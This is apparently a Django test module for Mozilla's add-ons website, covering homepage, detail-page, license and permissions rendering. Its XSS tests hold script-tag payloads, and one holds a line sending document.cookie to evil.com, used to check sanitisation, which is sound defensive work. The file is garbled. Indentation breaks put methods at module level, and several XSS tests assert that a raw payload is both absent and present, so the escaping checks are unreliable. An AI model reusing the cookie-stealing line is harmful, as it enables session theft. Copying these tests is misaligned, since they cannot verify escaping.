    # Reuse the first listed author of ``original`` as a listed author
    # of ``copy`` and return it so callers can assert on it.
    author = original.listed_authors[0]
    AddonUser.objects.create(addon=copy, user=author, listed=True)
    return author
def check_cat_sidebar(url, addon):
    """Ensures that the sidebar shows the categories for the correct type."""
    # Clear the cache so a previous type's sidebar isn't served --
    # presumably the sidebar fragment is cached; confirm if needed.
    cache.clear()
    for type_ in [amo.ADDON_EXTENSION, amo.ADDON_THEME, amo.ADDON_SEARCH]:
        addon.update(type=type_)
        r = Client().get(url)
        assert pq(r.content)('#side-nav').attr('data-addontype') == str(type_)
def _test_hovercards(self, doc, addons, src=''):
    """Shared check: each add-on in ``addons`` has one hovercard whose
    install button, link href (with ``src`` param) and title match.

    NOTE(review): defined at module level but written like a TestCase
    method -- ``self`` is accepted (and unused here) so it can be bound
    as a method by callers. Uses the Python 2 ``unicode`` builtin.
    """
    addons = list(addons)
    assert doc.find('.addon.hovercard').length == len(addons)
    for addon in addons:
        btn = doc.find('.install[data-addon="%s"]' % addon.id)
        assert btn.length == 1
        hc = btn.parents('.addon.hovercard')
        assert hc.find('a').attr('href') == (
            urlparams(addon.get_url_path(), src=src))
        assert hc.find('h3').text() == unicode(addon.name)
class TestHomepage(TestCase):
    """Smoke tests for the legacy AMO homepage."""

    def setUp(self):
        super(TestHomepage, self).setUp()
        self.base_url = reverse('home')

    def test_304(self):
        """Conditional GET with a matching ETag returns an empty 304."""
        self.url = '/en-US/firefox/'
        response = self.client.get(self.url)
        assert 'ETag' in response
        response = self.client.get(self.url,
                                   HTTP_IF_NONE_MATCH=response['ETag'])
        assert response.status_code == 304
        assert not response.content
        response = self.client.get(self.url,
                                   HTTP_IF_NONE_MATCH='random_etag_string')
        assert response.status_code == 200
        assert response.content

    def test_thunderbird(self):
        """Thunderbird homepage should have the Thunderbird title."""
        r = self.client.get('/en-US/thunderbird/')
        doc = pq(r.content)
        assert 'Add-ons for Thunderbird' == doc('title').text()

    def test_welcome_msg(self):
        """The welcome banner text is app-specific."""
        r = self.client.get('/en-US/firefox/')
        welcome = pq(r.content)('#site-welcome').remove('a.close')
        assert welcome.text() == (
            'Welcome to Firefox Add-ons.\nChoose from thousands of extra '
            'features and styles to make Firefox your own.')
        r = self.client.get('/en-US/thunderbird/')
        welcome = pq(r.content)('#site-welcome').remove('a.close')
        assert welcome.text() == (
            'Welcome to Thunderbird Add-ons.\nAdd extra features and styles '
            'to make Thunderbird your own.')

    def test_try_new_frontend_banner_presence(self):
        """Banner appears only with the try-new-frontend waffle switch."""
        self.url = '/en-US/firefox/'
        response = self.client.get(self.url)
        assert 'AMO is getting a new look.' not in response.content
        with override_switch('try-new-frontend', active=True):
            response = self.client.get(self.url)
            assert 'AMO is getting a new look.' in response.content
class TestHomepageFeatures(TestCase):
    """Checks for the featured/popular sections on the homepage."""
    fixtures = ['base/appversion',
                'base/users',
                'base/addon_3615',
                'base/collections',
                'base/global-stats',
                'base/featured',
                'addons/featured',
                'bandwagon/featured_collections']

    def setUp(self):
        super(TestHomepageFeatures, self).setUp()
        self.url = reverse('home')

    def test_no_unreviewed(self):
        """No nominated (unreviewed) add-on shows in any homepage list."""
        response = self.client.get(self.url)
        addon_lists = 'popular featured hotness personas'.split()
        for key in addon_lists:
            for addon in response.context[key]:
                assert addon.status != amo.STATUS_NOMINATED

    def test_seeall(self):
        """Each section's 'See All' link points at its browse page."""
        Collection.objects.update(type=amo.COLLECTION_FEATURED)
        doc = pq(self.client.get(self.url).content)
        browse_extensions = reverse('browse.extensions')
        browse_personas = reverse('browse.personas')
        browse_collections = reverse('collections.list')
        sections = {
            '#popular-extensions': browse_extensions + '?sort=users',
            '#featured-extensions': browse_extensions + '?sort=featured',
            '#upandcoming': browse_extensions + '?sort=hotness',
            '#featured-themes': browse_personas,
            '#featured-collections': browse_collections + '?sort=featured',
        }
        # NOTE(review): iteritems() is Python 2 only.
        for id_, url in sections.iteritems():
            # Check that the "See All" link points to the correct page.
            assert doc.find('%s .seeall' % id_).attr('href') == url
class TestOldContributionRedirects(TestCase):
    """Legacy contribution-related URLs permanently redirect to the
    add-on detail page."""
    fixtures = ['base/appversion', 'base/addon_592']

    def setUp(self):
        self.detail_url = reverse('addons.detail', args=['a592'])

    def _check_redirects_to_detail(self, viewname, *extra_args):
        # Resolve the legacy URL and follow it; a 301 to the detail
        # page is expected in every case.
        url = reverse(viewname, args=['a592'] + list(extra_args))
        response = self.client.get(url, follow=True)
        self.assert3xx(response, self.detail_url, 301)

    def test_installed(self):
        self._check_redirects_to_detail('addons.installed')

    def test_contribute(self):
        self._check_redirects_to_detail('addons.contribute')

    def test_contribute_status(self):
        self._check_redirects_to_detail('addons.contribute_status',
                                        'complete')
        self._check_redirects_to_detail('addons.contribute_status',
                                        'cancel')

    def test_meet(self):
        self._check_redirects_to_detail('addons.meet')

    def test_thanks(self):
        self._check_redirects_to_detail('addons.thanks')

    def test_roadblock(self):
        self._check_redirects_to_detail('addons.roadblock')
class TestContributionsURL(TestCase):
    """The contribution button only appears once Addon.contributions is
    set, and it goes through the outgoing-link redirector."""
    fixtures = ['base/addon_3615', 'base/addon_592',
                'base/users', 'addons/eula+contrib-addon',
                'addons/addon_228106_info+dev+bio.json',
                'addons/addon_228107_multiple-devs.json']

    def setUp(self):
        self.addon = Addon.objects.get(pk=592)
        user = UserProfile.objects.get(pk=999)
        AddonUser(addon=self.addon, user=user).save()

    def test_button_appears_if_set(self):
        # No button by default because Addon.contributions url not set.
        response = self.client.get(self.addon.get_url_path())
        assert pq(response.content)('#contribution-url-button').length == 0

        # Set it and it appears though.
        self.addon.update(contributions='https://paypal.me/foooo')
        response = self.client.get(self.addon.get_url_path())
        button = pq(response.content)('#contribution-url-button')
        assert button.length == 1, response.content
        assert button[0].attrib['href'] == get_outgoing_url(
            'https://paypal.me/foooo')
class TestLicensePage(TestCase):
    """Tests for the add-on version license page and its redirects."""
    fixtures = ['base/addon_3615']

    def setUp(self):
        super(TestLicensePage, self).setUp()
        self.addon = Addon.objects.get(id=3615)
        self.version = self.addon.current_version

    def test_legacy_redirect(self):
        """Old /versions/license/<id> URLs 301 to the license URL."""
        response = self.client.get(
            '/en-US/firefox/versions/license/%s' % self.version.id,
            follow=True)
        self.assert3xx(response, self.version.license_url(), 301)

    def test_legacy_redirect_deleted(self):
        """The legacy redirect 404s for a deleted version."""
        self.version.delete()
        response = self.client.get(
            '/en-US/firefox/versions/license/%s' % self.version.id)
        assert response.status_code == 404

    def test_explicit_version(self):
        """An explicit version number selects that version."""
        url = reverse('addons.license', args=['a3615', self.version.version])
        r = self.client.get(url)
        assert r.status_code == 200
        assert r.context['version'] == self.version

    def test_implicit_version(self):
        """Without a version number, the current version is used."""
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        assert r.status_code == 200
        assert r.context['version'] == self.addon.current_version

    def test_no_license(self):
        """404 when the version has no license."""
        self.version.update(license=None)
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        assert r.status_code == 404

    def test_no_version(self):
        """404 when the add-on has no versions at all."""
        self.addon.versions.all().delete()
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        assert r.status_code == 404

    def test_unlisted_version(self):
        """404 for an unlisted version even if it has a license."""
        self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
        assert self.version.license
        url = reverse('addons.license', args=['a3615'])
        r = self.client.get(url)
        assert r.status_code == 404

    def test_duplicate_version_number(self):
        """With duplicate version numbers the current version wins."""
        Version.objects.create(addon=self.addon, version=self.version.version)
        url = reverse('addons.license', args=['a3615', self.version.version])
        r = self.client.get(url)
        assert r.status_code == 200
        assert r.context['version'] == self.addon.current_version

    def test_cat_sidebar(self):
        """Sidebar categories follow the add-on type on this page too."""
        check_cat_sidebar(reverse('addons.license', args=['a3615']),
                          self.addon)
class TestICloudRedirect(TestCase):
    """Waffle-gated redirect for the blocked iCloud Bookmarks add-on."""

    def setUp(self):
        addon_factory(slug='icloud-bookmarks')

    @override_switch('icloud_bookmarks_redirect', active=True)
    def test_redirect_with_waffle(self):
        response = self.client.get('/en-US/firefox/addon/icloud-bookmarks/')
        assert response.status_code == 302
        assert response.get('location') == (
            '%s/blocked/i1214/' % settings.SITE_URL)

    @override_switch('icloud_bookmarks_redirect', active=False)
    def test_redirect_without_waffle(self):
        response = self.client.get('/en-US/firefox/addon/icloud-bookmarks/')
        assert response.status_code == 200
        assert response.context['addon'] is not None
class TestDetailPage(TestCase):
fixtures = ['base/addon_3615',
'base/users',
'base/addon_59',
'base/addon_592',
'base/addon_4594_a9',
'addons/listed',
'addons/persona']
    def setUp(self):
        # Fixture add-on 3615 drives most of the assertions below.
        super(TestDetailPage, self).setUp()
        self.addon = Addon.objects.get(id=3615)
        self.url = self.addon.get_url_path()
        self.more_url = self.addon.get_url_path(more=True)
    def test_try_new_frontend_banner_presence(self):
        """Banner appears only with the try-new-frontend waffle switch."""
        response = self.client.get(self.url)
        assert 'AMO is getting a new look.' not in response.content
        with override_switch('try-new-frontend', active=True):
            response = self.client.get(self.url)
            assert 'AMO is getting a new look.' in response.content
    def test_304(self):
        """Conditional GET with a matching ETag returns an empty 304."""
        response = self.client.get(self.url)
        assert 'ETag' in response
        response = self.client.get(self.url,
                                   HTTP_IF_NONE_MATCH=response['ETag'])
        assert response.status_code == 304
        assert not response.content
        response = self.client.get(self.url,
                                   HTTP_IF_NONE_MATCH='random_etag_string')
        assert response.status_code == 200
        assert response.content
    def test_site_title(self):
        """The page header carries the site title."""
        r = self.client.get(self.url)
        assert pq(r.content)('h1.site-title').text() == 'Add-ons'
    def test_addon_headings(self):
        """Detail page shows the about/home-page headings."""
        r = self.client.get(self.url)
        doc = pq(r.content)
        assert doc('h2:first').text() == 'About this Add-on'
        assert doc('.metadata .home').text() == 'Add-on home page'
    def test_anonymous_extension(self):
        """Anonymous users can view an extension detail page."""
        response = self.client.get(self.url)
        assert response.status_code == 200
        assert response.context['addon'].id == 3615
    def test_anonymous_persona(self):
        """Anonymous users can view a persona detail page."""
        response = self.client.get(reverse('addons.detail', args=['a15663']))
        assert response.status_code == 200
        assert response.context['addon'].id == 15663
def test_review_microdata_personas(self):
a = Addon.objects.get(id=15663)
a.name = '<script>alert("fff")</script>'
a.save()
response = self.client.get(reverse('addons.detail', args=['a15663']))
assert (
'<script>alert("fff")</script>' in
response.content)
assert '<script>' not in response.content
    def test_report_abuse_links_to_form_age(self):
        """#report-abuse links to the abuse form for this add-on."""
        response = self.client.get_ajax(
            reverse('addons.detail', args=['a3615']))
        doc = pq(response.content)
        expected = reverse('addons.abuse', args=['3615'])
        assert doc('#report-abuse').attr('href') == expected
    def test_personas_context(self):
        """Persona detail pages expose the review-related context vars."""
        response = self.client.get(reverse('addons.detail', args=['a15663']))
        assert 'review_form' in response.context
        assert 'reviews' in response.context
        assert 'get_replies' in response.context
    def test_unreviewed_robots(self):
        """Check that unreviewed add-ons do not get indexed."""
        # NOTE(review): mutates settings.ENGAGE_ROBOTS directly and
        # never restores it -- consider override_settings.
        url = self.addon.get_url_path()
        m = 'meta[content=noindex]'
        assert self.addon.status == amo.STATUS_PUBLIC
        settings.ENGAGE_ROBOTS = True
        doc = pq(self.client.get(url).content)
        assert not doc(m)
        settings.ENGAGE_ROBOTS = False
        doc = pq(self.client.get(url).content)
        assert doc(m)
        # Nominated (unreviewed) add-ons get noindex regardless of the
        # ENGAGE_ROBOTS setting.
        self.addon.update(status=amo.STATUS_NOMINATED)
        settings.ENGAGE_ROBOTS = False
        doc = pq(self.client.get(url).content)
        assert doc(m)
        settings.ENGAGE_ROBOTS = True
        doc = pq(self.client.get(url).content)
        assert doc(m)
    def test_more_about(self):
        # Don't show more about box if there's nothing to populate it.
        self.addon.developer_comments_id = None
        self.addon.description_id = None
        self.addon.previews.all().delete()
        self.addon.save()

        r = self.client.get(self.url)
        doc = pq(r.content)
        assert doc('#more-about').length == 0
        assert doc('.article.userinput').length == 0
    def test_type_redirect(self):
        """
        If current add-on's type is unsupported by app, redirect to an
        app that supports it.
        """
        # Thunderbird can't do search engines
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = amo.THUNDERBIRD.short
        response = self.client.get(reverse('addons.detail', args=['a4594']),
                                   follow=False)
        assert response.status_code == 301
        # The Location must swap thunderbird for firefox.
        assert response['Location'].find(amo.THUNDERBIRD.short) == -1
        assert (response['Location'].find(amo.FIREFOX.short) >= 0)
    def test_compatible_app_redirect(self):
        """
        For add-ons incompatible with the current app, redirect to one
        that's supported.
        """
        # NOTE(review): ``.keys()[0]`` relies on Python 2 returning a
        # list from dict.keys().
        comp_app = self.addon.compatible_apps.keys()[0]
        not_comp_app = [a for a in amo.APP_USAGE
                        if a not in self.addon.compatible_apps.keys()][0]

        # no SeaMonkey version => redirect
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = not_comp_app.short
        r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
        assert r.status_code == 301
        assert r['Location'].find(not_comp_app.short) == -1
        assert r['Location'].find(comp_app.short) >= 0

        # compatible app => 200
        prefixer = amo.urlresolvers.get_url_prefix()
        prefixer.app = comp_app.short
        r = self.client.get(reverse('addons.detail', args=[self.addon.slug]))
        assert r.status_code == 200
    def test_external_urls(self):
        """Check that external URLs are properly escaped."""
        # The home link must go through the outgoing redirect service.
        response = self.client.get(self.url)
        doc = pq(response.content)
        assert doc(
            'aside a.home[href^="%s"]' % settings.REDIRECT_URL).length == 1
    def test_no_privacy_policy(self):
        """Make sure privacy policy is not shown when not present."""
        self.addon.privacy_policy_id = None
        self.addon.save()
        response = self.client.get(self.url)
        doc = pq(response.content)
        assert doc('.privacy-policy').length == 0
    def test_privacy_policy(self):
        """A set privacy policy renders a link to the policy page."""
        self.addon.privacy_policy = 'foo bar'
        self.addon.save()
        response = self.client.get(self.url)
        doc = pq(response.content)
        assert doc('.privacy-policy').length == 1
        privacy_url = reverse('addons.privacy', args=[self.addon.slug])
        assert doc('.privacy-policy').attr('href').endswith(privacy_url)
    def test_permissions_webext(self):
        """Webextension permissions show a link plus a modal dialog with
        host access first, then known named permissions."""
        file_ = self.addon.current_version.all_files[0]
        file_.update(is_webextension=True)
        WebextPermission.objects.create(file=file_, permissions=[
            u'http://*/*', u'<all_urls>', u'bookmarks', u'nativeMessaging',
            u'made up permission'])
        WebextPermissionDescription.objects.create(
            name=u'bookmarks', description=u'Read and modify bookmarks')
        WebextPermissionDescription.objects.create(
            name=u'nativeMessaging',
            description=u'Exchange messages with programs other than Firefox')
        response = self.client.get(self.url)
        doc = pq(response.content)
        # The link next to the button
        assert doc('a.webext-permissions').length == 1
        # And the model dialog
        assert doc('#webext-permissions').length == 1
        assert u'perform certain functions (example: a tab management' in (
            doc('#webext-permissions div.prose').text())
        assert doc('ul.webext-permissions-list').length == 1
        # 'made up permission' has no description so only 3 entries show.
        assert doc('li.webext-permissions-list').length == 3
        # See File.webext_permissions for the order logic
        assert doc('li.webext-permissions-list').text() == (
            u'Access your data for all websites '
            u'Exchange messages with programs other than Firefox '
            u'Read and modify bookmarks')
    def test_permissions_webext_no_permissions(self):
        """No permissions: neither the link nor the dialog is rendered."""
        file_ = self.addon.current_version.all_files[0]
        file_.update(is_webextension=True)
        assert file_.webext_permissions_list == []
        response = self.client.get(self.url)
        doc = pq(response.content)
        # Don't show the link when no permissions.
        assert doc('a.webext-permissions').length == 0
        # And no model dialog
        assert doc('#webext-permissions').length == 0
    def test_permissions_non_webext(self):
        """Legacy (non-webext) extensions get a warning dialog instead of
        a permissions list."""
        file_ = self.addon.current_version.all_files[0]
        file_.update(is_webextension=False)
        response = self.client.get(self.url)
        doc = pq(response.content)
        # The link next to the button
        assert doc('a.webext-permissions').length == 1
        # danger danger icon shown for oldie xul addons
        assert doc('a.webext-permissions img').length == 1
        # And the model dialog
        assert doc('#webext-permissions').length == 1
        assert u'Please note this add-on uses legacy technology' in (
            doc('#webext-permissions div.prose').text())
        assert doc('.webext-permissions-list').length == 0
    def test_permissions_non_extension(self):
        """Non-extension types (themes) never show permissions UI."""
        self.addon.update(type=amo.ADDON_THEME)
        file_ = self.addon.current_version.all_files[0]
        assert not file_.is_webextension
        response = self.client.get(self.url)
        doc = pq(response.content)
        # Don't show the link for non-extensions
        assert doc('a.webext-permissions').length == 0
        # And no model dialog
        assert doc('#webext-permissions').length == 0
def test_permissions_xss_single_url(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
WebextPermission.objects.create(file=file_, permissions=[
u'<script>alert("//")</script>'])
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('li.webext-permissions-list').text() == (
u'Access your data for '
u'<script>alert("//")</script>')
assert '<script>alert(' not in response.content
assert '<script>alert(' in response.content
def test_permissions_xss_multiple_url(self):
file_ = self.addon.current_version.all_files[0]
file_.update(is_webextension=True)
WebextPermission.objects.create(file=file_, permissions=[
'<script>alert("//")</script>',
'<script>foo("https://")</script>'])
response = self.client.get(self.url)
doc = pq(response.content)
assert doc('li.webext-permissions-list').text() == (
u'Access your data on the following websites:\n'
u'<script>alert("//")</script>\n'
u'<script>foo("https://")</script>')
assert '<script>alert(' not in response.content
assert '<script>foo(' not in response.content
assert '<script>alert(' in response.content
assert '<script>foo(' in response.content
    def test_simple_html_is_rendered_in_privacy(self):
        """Whitelisted simple HTML in the privacy policy is kept as-is."""
        self.addon.privacy_policy = """
            <strong> what the hell..</strong>
            <ul>
                <li>papparapara</li>
                <li>todotodotodo</li>
            </ul>
            <ol>
                <a href="irc://irc.mozilla.org/firefox">firefox</a>
                Introduce yourself to the community, if you like!
                This text will appear publicly on your user info page.
                <li>papparapara2</li>
                <li>todotodotodo2</li>
            </ol>
            """
        self.addon.save()

        r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
        doc = pq(r.content)

        assert norm(doc(".policy-statement strong")) == (
            "<strong> what the hell..</strong>")
        assert norm(doc(".policy-statement ul")) == (
            "<ul><li>papparapara</li><li>todotodotodo</li></ul>")
        assert doc(".policy-statement ol a").text() == (
            "firefox")
        assert norm(doc(".policy-statement ol li:first")) == (
            "<li>papparapara2</li>")
def test_evil_html_is_not_rendered_in_privacy(self):
self.addon.privacy_policy = """
<script type="text/javascript">
window.location = 'http://evil.com/?c=' + document.cookie;
</script>
Muhuhahahahahahaha!
"""
self.addon.save()
r = self.client.get(reverse('addons.privacy', args=[self.addon.slug]))
doc = pq(r.content)
policy = str(doc(".policy-statement"))
assert policy.startswith(
'<div class="policy-statement"><script'), (
'Unexpected: %s' % policy[0:50])
    def test_button_size(self):
        """Make sure install buttons on the detail page are prominent."""
        response = self.client.get(reverse('addons.detail', args=['a3615']),
                                   follow=True)
        assert pq(response.content)('.button').hasClass('prominent')
    def test_button_src_default(self):
        """Install button gets the default dp-btn-primary src param."""
        r = self.client.get(self.url, follow=True)
        assert (pq(r.content)('#addon .button').attr(
            'href').endswith('?src=dp-btn-primary'))
    def test_button_src_trickle(self):
        """A src query param on the page trickles into the button href."""
        r = self.client.get(self.url + '?src=trickleortreat', follow=True)
        assert (pq(r.content)('#addon .button').attr(
            'href').endswith('?src=trickleortreat'))
    def test_version_button_src_default(self):
        """Release-notes button gets the default dp-btn-version src."""
        r = self.client.get(self.url, follow=True)
        assert (pq(r.content)('#detail-relnotes .button').attr(
            'href').endswith('?src=dp-btn-version'))
    def test_version_button_src_trickle(self):
        """A src query param trickles into the release-notes button too."""
        r = self.client.get(self.url + '?src=trickleortreat', follow=True)
        assert (pq(r.content)('#detail-relnotes .button').attr(
            'href').endswith('?src=trickleortreat'))
    def test_version_more_link(self):
        """The release-notes more-info link points at the versions page."""
        doc = pq(self.client.get(self.url).content)
        versions_url = reverse('addons.versions', args=[self.addon.slug])
        assert (doc('#detail-relnotes a.more-info').attr('href') ==
                versions_url)
    def test_invalid_version(self):
        """Only render details pages for add-ons that have a version."""
        # Wipe all versions.
        self.addon.versions.all().delete()
        # Try accessing the details page.
        response = self.client.get(self.url)
        assert response.status_code == 404
    def test_no_listed_authors(self):
        r = self.client.get(reverse('addons.detail', args=['a59']))
        # We shouldn't show an avatar since this has no listed_authors.
        doc = pq(r.content)
        assert 0 == len(doc('.avatar'))
def test_authors_xss(self):
    """Author display names are escaped, never rendered as raw HTML.

    The original assertions were contradictory: they required the raw
    '<script>alert' both to be *in* and *not in* the output, so the
    test could never pass. The first assertion must check for the
    HTML-escaped form instead.
    """
    name = '<script>alert(1)</script>'
    user = UserProfile.objects.create(username='test',
                                      display_name=name)
    output = users_list([user])
    # The name appears only in escaped form...
    assert '&lt;script&gt;alert' in output
    # ...and never as a live script tag.
    assert '<script>alert' not in output
def test_display_compatible_apps(self):
    """
    Show compatibility info for extensions but not for search engines.
    """
    r = self.client.get(self.addon.get_url_path())
    assert pq(r.content)('#detail-relnotes .compat').length == 1

    # Search engines get no app-compatibility block on their detail page.
    a = Addon.objects.filter(type=amo.ADDON_SEARCH)[0]
    r = self.client.get(a.get_url_path())
    assert pq(r.content)('#detail-relnotes .compat').length == 0
def test_is_restart_required(self):
    """The 'Requires Restart' badge tracks File.is_restart_required."""
    span_is_restart_required = (
        '<span class="is-restart-required">Requires Restart</span>')
    file_ = self.addon.current_version.all_files[0]
    assert file_.is_restart_required is False
    response = self.client.get(self.url)
    assert span_is_restart_required not in response.content
    # Flipping the flag makes the badge appear on the next render.
    file_.update(is_restart_required=True)
    response = self.client.get(self.url)
    assert span_is_restart_required in response.content
def test_fx57_label_is_webextension(self):
    """Test that the Firefox 57 label is being shown.

    That label depends on `is_webextension` being set or
    if the add-on is a mozilla internally signed add-on.
    """
    file_ = self.addon.current_version.all_files[0]
    assert file_.is_webextension is False
    # Not a webextension yet, so no label link is rendered.
    response = self.client.get(self.url)
    doc = pq(response.content)
    assert not doc('a.is-webextension')
    file_.update(is_webextension=True, is_restart_required=False)
    assert file_.is_webextension is True
    # Once flagged, the label links to the SUMO explanation page.
    response = self.client.get(self.url)
    doc = pq(response.content)
    link = doc('a.is-webextension')
    assert (
        link.attr['href'] ==
        'https://support.mozilla.org/kb/firefox-add-technology-modernizing'
    )
def test_fx57_label_is_mozilla_signed_extension(self):
    """Test that the Firefox 57 label is being shown.

    That label depends on `is_webextension` being set or
    if the add-on is a mozilla internally signed add-on.
    """
    file_ = self.addon.current_version.all_files[0]
    assert file_.is_mozilla_signed_extension is False
    # Not mozilla-signed yet, so no label link is rendered.
    response = self.client.get(self.url)
    doc = pq(response.content)
    assert not doc('a.is-webextension')
    file_.update(is_mozilla_signed_extension=True)
    assert file_.is_mozilla_signed_extension is True
    # Mozilla-signed add-ons also get the label, pointing at SUMO.
    response = self.client.get(self.url)
    doc = pq(response.content)
    link = doc('a.is-webextension')
    assert (
        link.attr['href'] ==
        'https://support.mozilla.org/kb/firefox-add-technology-modernizing'
    )
def test_version_displayed(self):
    """The current version number appears on the detail page."""
    doc = pq(self.client.get(self.url).content)
    assert doc('.version-number').text() == '2.1.072'
def test_disabled_user_message(self):
    """Author-disabled add-ons 404 with an explanatory message."""
    self.addon.update(disabled_by_user=True)
    response = self.client.get(self.url)
    assert response.status_code == 404
    assert 'removed by its author' in response.content
def test_disabled_status_message(self):
    """Admin-disabled add-ons 404 with an explanatory message."""
    self.addon.update(status=amo.STATUS_DISABLED)
    response = self.client.get(self.url)
    assert response.status_code == 404
    assert 'disabled by an administrator' in response.content
def test_deleted_status_message(self):
    """Deleted add-ons return a plain 404."""
    addon = Addon.objects.get(id=3615)
    addon.update(status=amo.STATUS_DELETED)
    url = reverse('addons.detail', args=[addon.slug])
    assert self.client.get(url).status_code == 404
def test_more_url(self):
    """The #more-webpage container points at the AJAX 'more' URL."""
    doc = pq(self.client.get(self.url).content)
    expected = self.addon.get_url_path(more=True)
    assert doc('#more-webpage').attr('data-more-url') == expected
def test_unlisted_addon_returns_404(self):
    """Unlisted addons are not listed and return 404."""
    self.make_addon_unlisted(self.addon)
    response = self.client.get(self.url)
    assert response.status_code == 404
def test_admin_buttons(self):
    """Manage buttons on the detail page depend on the viewer's role."""
    def get_detail():
        # Re-fetch the detail page under the currently logged-in user.
        return self.client.get(reverse('addons.detail', args=['a3615']),
                               follow=True)
    # No login, no buttons.
    assert pq(get_detail().content)('.manage-button').length == 0
    # No developer, no buttons.
    self.client.login(email='regular@mozilla.com')
    assert pq(get_detail().content)('.manage-button').length == 0
    # developer gets a 'Manage' button to devhub
    self.client.login(email='del@icio.us')
    content = get_detail().content
    assert pq(content)('.manage-button').length == 1
    assert pq(content)('.manage-button a').eq(0).attr('href') == (
        self.addon.get_dev_url())
    # reviewer gets an 'Add-on Review' button
    self.client.login(email='reviewer@mozilla.com')
    content = get_detail().content
    assert pq(content)('.manage-button').length == 1
    assert pq(content)('.manage-button a').eq(0).attr('href') == (
        reverse('reviewers.review', args=[self.addon.slug]))
    # admins gets devhub, 'Add-on Review' and 'Admin Manage' button too
    self.client.login(email='admin@mozilla.com')
    content = get_detail().content
    assert pq(content)('.manage-button').length == 3
    assert pq(content)('.manage-button a').eq(0).attr('href') == (
        self.addon.get_dev_url())
    assert pq(content)('.manage-button a').eq(1).attr('href') == (
        reverse('reviewers.review', args=[self.addon.slug]))
    assert pq(content)('.manage-button a').eq(2).attr('href') == (
        reverse('zadmin.addon_manage', args=[self.addon.slug]))
def test_reviews(self):
    """Only ratings that have a body show up as reviews on the page."""
    def create_review(body='review text'):
        # Helper: one rating by a fresh user with a random score.
        return Rating.objects.create(
            addon=self.addon, user=user_factory(),
            rating=random.randrange(0, 6),
            body=body)
    url = reverse('addons.detail', args=['a3615'])
    create_review()
    response = self.client.get(url, follow=True)
    assert len(response.context['reviews']) == 1
    # Add a new review but with no body - shouldn't be shown on detail page
    create_review(body=None)
    response = self.client.get(url, follow=True)
    assert len(response.context['reviews']) == 1
    # Test one last time in case caching
    create_review()
    response = self.client.get(url, follow=True)
    assert len(response.context['reviews']) == 2
def get_pq(self):
    """Fetch self.url and return the response content as a PyQuery doc."""
    response = self.client.get(self.url)
    return pq(response.content)
def test_adu_stats_private(self):
    """Private stats: the ADU count is shown but not linked."""
    assert not self.addon.public_stats
    daily_users = self.get_pq()('#daily-users')
    assert daily_users.length == 1
    assert daily_users.find('a').length == 0
def test_adu_stats_public(self):
    """Public stats: the ADU count links to the statistics dashboard."""
    self.addon.update(public_stats=True)
    assert self.addon.show_adu()
    adu = self.get_pq()('#daily-users')

    # Check that ADU does link to public statistics dashboard.
    assert adu.find('a').attr('href') == (
        reverse('stats.overview', args=[self.addon.slug]))

    # Check formatted count.
    assert adu.text().split()[0] == numberfmt(
        self.addon.average_daily_users)

    # Check if we hide link when there are no ADU.
    self.addon.update(average_daily_users=0)
    assert self.get_pq()('#daily-users').length == 0
def test_adu_stats_regular(self):
    """Regular users see the ADU count without a dashboard link."""
    self.client.login(email='regular@mozilla.com')
    # Should not be a link to statistics dashboard for regular users.
    daily_users = self.get_pq()('#daily-users')
    assert daily_users.length == 1
    assert daily_users.find('a').length == 0
def test_adu_stats_admin(self):
    """Add-on authors get a link to the statistics dashboard."""
    self.client.login(email='del@icio.us')
    href = self.get_pq()('#daily-users a.stats').attr('href')
    assert href == reverse('stats.overview', args=[self.addon.slug])
def test_downloads_stats_private(self):
    """Private stats: the download count is shown but not linked."""
    self.addon.update(type=amo.ADDON_SEARCH)
    assert not self.addon.public_stats
    downloads = self.get_pq()('#weekly-downloads')
    assert downloads.length == 1
    assert downloads.find('a').length == 0
def test_downloads_stats_public(self):
    """Public stats: the download count links to the stats dashboard."""
    self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
    assert not self.addon.show_adu()
    dls = self.get_pq()('#weekly-downloads')

    # Check that weekly downloads links to statistics dashboard.
    assert dls.find('a').attr('href') == (
        reverse('stats.overview', args=[self.addon.slug]))

    # Check formatted count.
    assert dls.text().split()[0] == numberfmt(self.addon.weekly_downloads)

    # Check if we hide link when there are no weekly downloads.
    self.addon.update(weekly_downloads=0)
    assert self.get_pq()('#weekly-downloads').length == 0
def test_downloads_stats_regular(self):
    """Regular users see the download count without a dashboard link."""
    self.addon.update(type=amo.ADDON_SEARCH)
    self.client.login(email='regular@mozilla.com')
    # Should not be a link to statistics dashboard for regular users.
    downloads = self.get_pq()('#weekly-downloads')
    assert downloads.length == 1
    assert downloads.find('a').length == 0
def test_downloads_stats_admin(self):
    """Add-on authors get a download-count link to the stats dashboard."""
    self.addon.update(public_stats=True, type=amo.ADDON_SEARCH)
    self.client.login(email='del@icio.us')
    href = self.get_pq()('#weekly-downloads a.stats').attr('href')
    assert href == reverse('stats.overview', args=[self.addon.slug])
def test_dependencies(self):
    """Dependent add-ons render as hovercards with dependency src params."""
    assert self.get_pq()('.dependencies').length == 0
    req = Addon.objects.get(id=592)
    AddonDependency.objects.create(addon=self.addon, dependent_addon=req)
    assert self.addon.all_dependencies == [req]
    # NOTE(review): cache.clear() before re-rendering — presumably the
    # dependency list is cached between requests; verify.
    cache.clear()
    d = self.get_pq()('.dependencies .hovercard')
    assert d.length == 1
    assert d.find('h3').text() == unicode(req.name)
    assert d.find('a').attr('href').endswith('?src=dp-dl-dependencies')
    assert d.find('.install-button a').attr('href').endswith(
        '?src=dp-hc-dependencies')
def test_license_link_builtin(self):
    """A builtin==1 license keeps its own name and links to its URL."""
    g = 'http://google.com'
    version = self.addon._current_version
    license = version.license
    license.builtin = 1
    license.name = 'License to Kill'
    license.url = g
    license.save()
    assert license.builtin == 1
    assert license.url == g
    a = self.get_pq()('.secondary.metadata .source-license a')
    assert a.attr('href') == g
    assert a.text() == 'License to Kill'
def test_license_builtin_creative_commons(self):
    """A builtin==11 license displays the constant's name, not its own."""
    g = 'http://google.com'
    version = self.addon._current_version
    constant = LICENSES_BY_BUILTIN[11]
    license = version.license
